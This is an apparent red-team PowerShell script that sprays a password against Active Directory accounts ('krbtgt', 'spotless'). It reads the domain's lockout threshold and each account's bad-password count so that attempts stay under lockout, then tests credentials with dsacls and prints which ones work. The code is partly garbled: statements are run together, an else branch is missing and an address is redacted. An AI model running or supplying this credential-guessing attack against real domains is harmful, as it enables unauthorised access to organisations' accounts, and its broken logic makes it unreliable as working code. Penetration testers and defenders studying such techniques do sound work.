$domain = ((cmd /c set u)[-3] -split "=")[-1]
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
# (Get-Content users.txt)
"krbtgt","spotless" | % {
$badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
$isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:[email protected].local /passwd:$password | select-string -pattern "Invalid Credentials" if ($isInvalid -match "Invalid") {
Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
Write-Host "[+] Working Credentials for $_ : $password" -foreground green